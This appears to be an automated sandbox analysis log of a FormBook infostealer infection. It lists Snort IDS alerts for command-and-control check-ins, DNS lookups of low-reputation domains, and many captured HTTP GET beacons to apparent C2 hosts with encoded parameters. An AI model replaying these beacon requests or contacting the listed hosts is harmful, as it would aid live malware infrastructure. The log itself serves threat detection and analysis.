Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49791 -> 199.59.243.226:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49792 -> 199.59.243.226:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49795 -> 148.66.22.236:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49796 -> 148.66.22.236:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49799 -> 162.254.38.5:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49800 -> 162.254.38.5:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49801 -> 162.254.38.5:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49804 -> 89.31.143.90:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49805 -> 89.31.143.90:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49806 -> 89.31.143.90:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49808 -> 85.159.66.93:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49809 -> 85.159.66.93:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49812 -> 162.159.134.42:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49813 -> 162.159.134.42:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49816 -> 195.154.21.79:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49817 -> 195.154.21.79:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49818 -> 195.154.21.79:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49820 -> 103.224.182.242:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49821 -> 103.224.182.242:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49822 -> 103.224.182.242:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49824 -> 185.104.28.238:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49825 -> 185.104.28.238:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49828 -> 84.32.84.32:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49829 -> 84.32.84.32:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49833 -> 45.130.41.127:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49834 -> 45.130.41.127:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49835 -> 45.130.41.127:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49837 -> 5.252.229.221:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49838 -> 5.252.229.221:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49841 -> 35.212.86.52:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49842 -> 35.212.86.52:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49845 -> 199.59.243.226:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49846 -> 199.59.243.226:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49849 -> 148.66.22.236:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49850 -> 148.66.22.236:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49851 -> 148.66.22.236:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49853 -> 162.254.38.5:80
Source: Traffic	Snort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.11.20:49854 -> 162.254.38.5:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.bumplays.xyz

Source: Joe Sandbox View	IP Address: 162.240.81.18 162.240.81.18
Source: Joe Sandbox View	IP Address: 162.159.134.42 162.159.134.42
Source: Joe Sandbox View	IP Address: 162.159.134.42 162.159.134.42

Source: Joe Sandbox View	ASN Name: LHPL LHPL
Source: Joe Sandbox View	ASN Name: NETSEC-HKNETSECHK NETSEC-HKNETSECHK
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: TRELLIAN-AS-APTrellianPtyLimitedAU TRELLIAN-AS-APTrellianPtyLimitedAU

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 17 Jul 2024 07:09:56 GMTserver: Apacheset-cookie: __tad=1721200196.5220061; expires=Sat, 15-Jul-2034 07:09:56 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 582content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 cb 6e db 30 10 3c 5b 5f b1 50 0e 92 91 5a 74 10 b4 45 6d 49 3d 14 28 d0 a2 87 22 69 cf 05 43 ad 2c 3a 12 a9 92 2b 3b 46 e0 7f ef 52 56 1e 6d 0e 8d 2e 36 c9 99 9d 99 d5 52 79 43 5d 5b 46 79 83 b2 e2 1f d2 d4 62 79 18 ba 4e e3 a2 b6 b6 ca ac 69 b5 c1 5c 9c 4e a2 dc 2b a7 7b 02 3a f4 58 c4 84 77 24 b6 72 27 4f bb 31 78 a7 8a 58 6c bd a8 b5 d9 a0 eb 9d 36 24 b4 ae 31 eb b4 c9 b6 3e 2e 73 71 c2 fe af 54 19 ed a4 03 87 95 76 a8 e8 17 9b b8 85 02 92 86 a8 5f 09 b1 df ef b3 97 2e 85 fb 60 95 f8 98 ac a3 48 08 b8 46 02 09 a4 3b b4 03 81 ad e1 72 b9 84 4e 2b 67 3d 2a 6b 2a 0f 64 01 ef 50 0d 84 0c 7c 90 02 5d 03 35 08 cf 12 40 ef 6c a7 3d ef 49 dd 7a a8 ad 03 6f 3b 64 8a f4 d6 44 f5 60 14 69 6b f8 b8 6d 6f a4 ba bd 9a 4a a5 73 b8 8f 66 7b 6d 2a bb cf 5a ab 64 40 65 0e fb 56 2a 4c ff ca 76 9e d4 7d b1 78 9f cc d7 d1 31 8a c8 1d 02 93 5d 7a 02 57 b9 1f 53 88 02 3c d2 b4 48 ff 55 7b 13 02 32 7f 16 1a 57 f7 df 27 cf 05 7c 7e 4a f2 f5 9a 7d c8 2a bd ef ac d1 64 79 6b b3 0a b6 3d 1e 03 f3 91 15 cd 66 19 37 c1 a4 75 0f 45 c9 d5 b2 0d 72 9c f9 e3 3e ff 99 39 f4 43 4b e1 fc 1e c2 7a 12 76 c1 67 88 93 9c 9f 10 d9 4e fb 20 f6 a5 5a 8f 30 d5 a2 7c 88 94 3e a5 9b 9f 4e 5f d7 ae 20 33 12 82 ef 23 30 56 35 29 3a 37 76 fc e5 7b 18 bb fa 7c f4 e8 c0 d3 0c 37 b6 e2 46 43 c0 6e 9c 1d 4c b5 3a bb 58 5e a8 cb 77 70 04 46 8f 20 a6 4d 97 63 44 df 6c 94 6d ad 2b e2 b3 7a 7c 62 08 93 cb cb e5 f8 f0 dc e6 95 de c1 c8 2d 92 4a 7b 76 7f 58 81 b1 06 d7 49 99 4b 68 1c d6 c5 ab e6 38 4c c4 65 52 7e 6a b5 ba 85 06 1d 8e 03 6b 08 5d 2e 24 5f 24 d6 61 35 63 a7 54 79 87 c4 e5 b9 f0 02 7f 0f 7a 57 c4 ac c4 6f a0 89 81 07 89 98 58 c4 cb 35 fc bc fa 56 bc 56 fd 6d b8 af 8f 02 dc 89 d0 82 b1 23 e1 ab f1 07 da ce bb 62 3c 04 00 00 Data Ascii: Tn0<[_PZtEmI=("iC,:+;FRVm.6RyC][FybyNi\N+{:Xw$r'O1xXl6$1>.sqTv_.`HF;rN+g=kdP\|]5@l=Izo;dD`ikmoJsf{mZd@eVLv}x1]zWS<HU{2W'\|~J}*dyk=f7uEr>9CKzvgN Z0\|>N_ 3#0V5):7v{\|7FCnL:X^wpF McDlm+z\|b-J{vXIKh8LeR~jk].$_$a5cTyzWoX5VVm#b<
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 17 Jul 2024 07:09:58 GMTserver: Apacheset-cookie: __tad=1721200198.6289284; expires=Sat, 15-Jul-2034 07:09:58 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 582content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 cb 6e db 30 10 3c 5b 5f b1 50 0e 92 91 5a 74 10 b4 45 6d 49 3d 14 28 d0 a2 87 22 69 cf 05 43 ad 2c 3a 12 a9 92 2b 3b 46 e0 7f ef 52 56 1e 6d 0e 8d 2e 36 c9 99 9d 99 d5 52 79 43 5d 5b 46 79 83 b2 e2 1f d2 d4 62 79 18 ba 4e e3 a2 b6 b6 ca ac 69 b5 c1 5c 9c 4e a2 dc 2b a7 7b 02 3a f4 58 c4 84 77 24 b6 72 27 4f bb 31 78 a7 8a 58 6c bd a8 b5 d9 a0 eb 9d 36 24 b4 ae 31 eb b4 c9 b6 3e 2e 73 71 c2 fe af 54 19 ed a4 03 87 95 76 a8 e8 17 9b b8 85 02 92 86 a8 5f 09 b1 df ef b3 97 2e 85 fb 60 95 f8 98 ac a3 48 08 b8 46 02 09 a4 3b b4 03 81 ad e1 72 b9 84 4e 2b 67 3d 2a 6b 2a 0f 64 01 ef 50 0d 84 0c 7c 90 02 5d 03 35 08 cf 12 40 ef 6c a7 3d ef 49 dd 7a a8 ad 03 6f 3b 64 8a f4 d6 44 f5 60 14 69 6b f8 b8 6d 6f a4 ba bd 9a 4a a5 73 b8 8f 66 7b 6d 2a bb cf 5a ab 64 40 65 0e fb 56 2a 4c ff ca 76 9e d4 7d b1 78 9f cc d7 d1 31 8a c8 1d 02 93 5d 7a 02 57 b9 1f 53 88 02 3c d2 b4 48 ff 55 7b 13 02 32 7f 16 1a 57 f7 df 27 cf 05 7c 7e 4a f2 f5 9a 7d c8 2a bd ef ac d1 64 79 6b b3 0a b6 3d 1e 03 f3 91 15 cd 66 19 37 c1 a4 75 0f 45 c9 d5 b2 0d 72 9c f9 e3 3e ff 99 39 f4 43 4b e1 fc 1e c2 7a 12 76 c1 67 88 93 9c 9f 10 d9 4e fb 20 f6 a5 5a 8f 30 d5 a2 7c 88 94 3e a5 9b 9f 4e 5f d7 ae 20 33 12 82 ef 23 30 56 35 29 3a 37 76 fc e5 7b 18 bb fa 7c f4 e8 c0 d3 0c 37 b6 e2 46 43 c0 6e 9c 1d 4c b5 3a bb 58 5e a8 cb 77 70 04 46 8f 20 a6 4d 97 63 44 df 6c 94 6d ad 2b e2 b3 7a 7c 62 08 93 cb cb e5 f8 f0 dc e6 95 de c1 c8 2d 92 4a 7b 76 7f 58 81 b1 06 d7 49 99 4b 68 1c d6 c5 ab e6 38 4c c4 65 52 7e 6a b5 ba 85 06 1d 8e 03 6b 08 5d 2e 24 5f 24 d6 61 35 63 a7 54 79 87 c4 e5 b9 f0 02 7f 0f 7a 57 c4 ac c4 6f a0 89 81 07 89 98 58 c4 cb 35 fc bc fa 56 bc 56 fd 6d b8 af 8f 02 dc 89 d0 82 b1 23 e1 ab f1 07 da ce bb 62 3c 04 00 00 Data Ascii: Tn0<[_PZtEmI=("iC,:+;FRVm.6RyC][FybyNi\N+{:Xw$r'O1xXl6$1>.sqTv_.`HF;rN+g=kdP\|]5@l=Izo;dD`ikmoJsf{mZd@eVLv}x1]zWS<HU{2W'\|~J}*dyk=f7uEr>9CKzvgN Z0\|>N_ 3#0V5):7v{\|7FCnL:X^wpF McDlm+z\|b-J{vXIKh8LeR~jk].$_$a5cTyzWoX5VVm#b<
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 17 Jul 2024 07:10:01 GMTserver: Apacheset-cookie: __tad=1721200202.2739564; expires=Sat, 15-Jul-2034 07:10:02 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 582content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 cb 6e db 30 10 3c 5b 5f b1 50 0e 92 91 5a 74 10 b4 45 6d 49 3d 14 28 d0 a2 87 22 69 cf 05 43 ad 2c 3a 12 a9 92 2b 3b 46 e0 7f ef 52 56 1e 6d 0e 8d 2e 36 c9 99 9d 99 d5 52 79 43 5d 5b 46 79 83 b2 e2 1f d2 d4 62 79 18 ba 4e e3 a2 b6 b6 ca ac 69 b5 c1 5c 9c 4e a2 dc 2b a7 7b 02 3a f4 58 c4 84 77 24 b6 72 27 4f bb 31 78 a7 8a 58 6c bd a8 b5 d9 a0 eb 9d 36 24 b4 ae 31 eb b4 c9 b6 3e 2e 73 71 c2 fe af 54 19 ed a4 03 87 95 76 a8 e8 17 9b b8 85 02 92 86 a8 5f 09 b1 df ef b3 97 2e 85 fb 60 95 f8 98 ac a3 48 08 b8 46 02 09 a4 3b b4 03 81 ad e1 72 b9 84 4e 2b 67 3d 2a 6b 2a 0f 64 01 ef 50 0d 84 0c 7c 90 02 5d 03 35 08 cf 12 40 ef 6c a7 3d ef 49 dd 7a a8 ad 03 6f 3b 64 8a f4 d6 44 f5 60 14 69 6b f8 b8 6d 6f a4 ba bd 9a 4a a5 73 b8 8f 66 7b 6d 2a bb cf 5a ab 64 40 65 0e fb 56 2a 4c ff ca 76 9e d4 7d b1 78 9f cc d7 d1 31 8a c8 1d 02 93 5d 7a 02 57 b9 1f 53 88 02 3c d2 b4 48 ff 55 7b 13 02 32 7f 16 1a 57 f7 df 27 cf 05 7c 7e 4a f2 f5 9a 7d c8 2a bd ef ac d1 64 79 6b b3 0a b6 3d 1e 03 f3 91 15 cd 66 19 37 c1 a4 75 0f 45 c9 d5 b2 0d 72 9c f9 e3 3e ff 99 39 f4 43 4b e1 fc 1e c2 7a 12 76 c1 67 88 93 9c 9f 10 d9 4e fb 20 f6 a5 5a 8f 30 d5 a2 7c 88 94 3e a5 9b 9f 4e 5f d7 ae 20 33 12 82 ef 23 30 56 35 29 3a 37 76 fc e5 7b 18 bb fa 7c f4 e8 c0 d3 0c 37 b6 e2 46 43 c0 6e 9c 1d 4c b5 3a bb 58 5e a8 cb 77 70 04 46 8f 20 a6 4d 97 63 44 df 6c 94 6d ad 2b e2 b3 7a 7c 62 08 93 cb cb e5 f8 f0 dc e6 95 de c1 c8 2d 92 4a 7b 76 7f 58 81 b1 06 d7 49 99 4b 68 1c d6 c5 ab e6 38 4c c4 65 52 7e 6a b5 ba 85 06 1d 8e 03 6b 08 5d 2e 24 5f 24 d6 61 35 63 a7 54 79 87 c4 e5 b9 f0 02 7f 0f 7a 57 c4 ac c4 6f a0 89 81 07 89 98 58 c4 cb 35 fc bc fa 56 bc 56 fd 6d b8 af 8f 02 dc 89 d0 82 b1 23 e1 ab f1 07 da ce bb 62 3c 04 00 00 Data Ascii: Tn0<[_PZtEmI=("iC,:+;FRVm.6RyC][FybyNi\N+{:Xw$r'O1xXl6$1>.sqTv_.`HF;rN+g=kdP\|]5@l=Izo;dD`ikmoJsf{mZd@eVLv}x1]zWS<HU{2W'\|~J}*dyk=f7uEr>9CKzvgN Z0\|>N_ 3#0V5):7v{\|7FCnL:X^wpF McDlm+z\|b-J{vXIKh8LeR~jk].$_$a5cTyzWoX5VVm#b<

Source: global traffic	HTTP traffic detected: GET /gtau/?Kn7Lg=jjMts8V&4vLHGxWP=6a8wAiP8Nsiqdywx/wAeOboGMqfuHF/ClnqsxXZ0va98FiwD2XWq/siHDQmXUAsZ/JgyufrlOwaVS73S62s0bM8YYFt1ZxcAwEGtPzSKoIbfRoKRq5jOmcQ= HTTP/1.1Host: www.caregiverhelps.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /8t2j/?4vLHGxWP=aobA67/DaZLBsoYZxXqXVQc4/kOFP6aqm3WKw/Ydtj0M5RNTDTHKcXRDxXkjPj6AUaojM3fUlQOG3h9+AJeLRNeZtcIGfB1COZ9gyyrTL8NylMS1hmIDE4M=&Kn7Lg=jjMts8V HTTP/1.1Host: www.hotelvteme.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /s079/?Kn7Lg=jjMts8V&4vLHGxWP=9E8HS8ae5Gw/kaId9Q0/9WRfsplAIBdfnl+hhvyboeSatMMwWb0kI5DruBzp11mJYIJxa2iC+xiZ5wzPhKCccjsoY4g5Q+gQ8Jnn2hfeqBcEfbkTiAa9n9Q= HTTP/1.1Host: www.tp-consulting.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /ezzv/?4vLHGxWP=s3rNothV9hJmKacr+txVAL+G4kVumuc99z/tPS0DhfSsXdfo+nysZJ8EjPwA9teLfkPbTSPBe2CYCSnR5Mix7IaACkj5fGdhI131yb5xAPnRJ4708N6rfqY=&Kn7Lg=jjMts8V HTTP/1.1Host: www.dynamologistics.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /3sxw/?4vLHGxWP=+xKuJHQ5dsiWWN0VBmlxpE1mOXZdUmlfN5TDFMggqfvl6uGRImAL1AeovqhVpD0VJxZAcmfbjN6TKe4miDJ5K8UIGHOSgYuByQWT5E4aKEZuLV8cV/na4Gw=&Kn7Lg=jjMts8V HTTP/1.1Host: www.deunopost.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /rdra/?4vLHGxWP=Kg6baAto6gsSq7f93fQp7kckoT+bme68IkKKhcXuM9kE5T4siURqLh+ShqaKlP8lJepOg85c3gqJ6aI8lXjzE8UpMZKFsbmDJ7mz3ah0lh2PrqfKxfSKGgo=&Kn7Lg=jjMts8V HTTP/1.1Host: www.uyjyf.workAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /a0qs/?4vLHGxWP=uLnrap2DRXG1lgo9Ktuq9oMON7CmjabwI0P8bRLz/w9lW2JwGSLZ3vND987jsNLbITXEE0Ddd/FvPk14Ef3IOV4b0VG4cjS+/6QoXThM8lyP4nD58CuXw+M=&Kn7Lg=jjMts8V HTTP/1.1Host: www.bumplays.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /5j76/?4vLHGxWP=qcCJojp/qvygYGeAZhbJNnzJUeqr2zZRolKP4dlmf36KmNxWaO5rike5tlnRyGHZnhZ/rZWQ5KEn/usQYEQXow6/GpGjFfL3vAjQsehljfSiOMR5yLlgEQU=&Kn7Lg=jjMts8V HTTP/1.1Host: www.sophi.pageAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /nv81/?4vLHGxWP=A7DxqwBv/9TUrH9JpzLEpJ6UryV+jI1w4gnc2Ia9xVw5Usb8RMFHDxi3AZpoa+e25z2WPbvYFpG45YQoKaidftPPGvtF78TqwvYPpPeRtweercOQu7ym9ZY=&Kn7Lg=jjMts8V HTTP/1.1Host: www.nurayyuksel.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /arws/?4vLHGxWP=V9NjEKlopNjCanAb5dj3yxp9dUMc8CQ72iFMSnNpqje1X2xP/Psizb4oTPkUidRuj6W/QwwyT5lmj7llH8/hAvRudQG8bQY3/oVOCe5/EMiHsKfW8mFTCKw=&Kn7Lg=jjMts8V HTTP/1.1Host: www.goodneighbor.clubAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /romu/?Kn7Lg=jjMts8V&4vLHGxWP=X3yxHylWmrMVJZX1z5tI73VmZq5Igk8f58wT9/ZUixIQmQvNCxe37fVgX8fdEmXClQupv3K/SceqGCo9La6/ZPEAMwPXMAXTIsZknA9+UKruPh7LmJCP9J8= HTTP/1.1Host: www.madate.devAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /r9oc/?4vLHGxWP=WL056cvEyZIj6gByFShPScW0LOQ73QJfUv2rUxG28YbpHWXWZfwRrVkAlfVH8mCBDPwaqYo4ujDzPhHwaWnW8p4oxOi+u+Ey60uYY+3gnwY2DqQqdySds30=&Kn7Lg=jjMts8V HTTP/1.1Host: www.yummie-food.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /gtau/?Kn7Lg=jjMts8V&4vLHGxWP=6a8wAiP8Nsiqdywx/wAeOboGMqfuHF/ClnqsxXZ0va98FiwD2XWq/siHDQmXUAsZ/JgyufrlOwaVS73S62s0bM8YYFt1ZxcAwEGtPzSKoIbfRoKRq5jOmcQ= HTTP/1.1Host: www.caregiverhelps.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /8t2j/?4vLHGxWP=aobA67/DaZLBsoYZxXqXVQc4/kOFP6aqm3WKw/Ydtj0M5RNTDTHKcXRDxXkjPj6AUaojM3fUlQOG3h9+AJeLRNeZtcIGfB1COZ9gyyrTL8NylMS1hmIDE4M=&Kn7Lg=jjMts8V HTTP/1.1Host: www.hotelvteme.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /s079/?Kn7Lg=jjMts8V&4vLHGxWP=9E8HS8ae5Gw/kaId9Q0/9WRfsplAIBdfnl+hhvyboeSatMMwWb0kI5DruBzp11mJYIJxa2iC+xiZ5wzPhKCccjsoY4g5Q+gQ8Jnn2hfeqBcEfbkTiAa9n9Q= HTTP/1.1Host: www.tp-consulting.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /ezzv/?4vLHGxWP=s3rNothV9hJmKacr+txVAL+G4kVumuc99z/tPS0DhfSsXdfo+nysZJ8EjPwA9teLfkPbTSPBe2CYCSnR5Mix7IaACkj5fGdhI131yb5xAPnRJ4708N6rfqY=&Kn7Lg=jjMts8V HTTP/1.1Host: www.dynamologistics.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /3sxw/?4vLHGxWP=+xKuJHQ5dsiWWN0VBmlxpE1mOXZdUmlfN5TDFMggqfvl6uGRImAL1AeovqhVpD0VJxZAcmfbjN6TKe4miDJ5K8UIGHOSgYuByQWT5E4aKEZuLV8cV/na4Gw=&Kn7Lg=jjMts8V HTTP/1.1Host: www.deunopost.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /rdra/?4vLHGxWP=Kg6baAto6gsSq7f93fQp7kckoT+bme68IkKKhcXuM9kE5T4siURqLh+ShqaKlP8lJepOg85c3gqJ6aI8lXjzE8UpMZKFsbmDJ7mz3ah0lh2PrqfKxfSKGgo=&Kn7Lg=jjMts8V HTTP/1.1Host: www.uyjyf.workAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko
